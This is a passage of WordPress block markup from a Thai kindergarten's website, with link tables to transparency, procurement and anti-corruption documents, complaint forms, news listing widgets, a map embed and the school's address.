data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 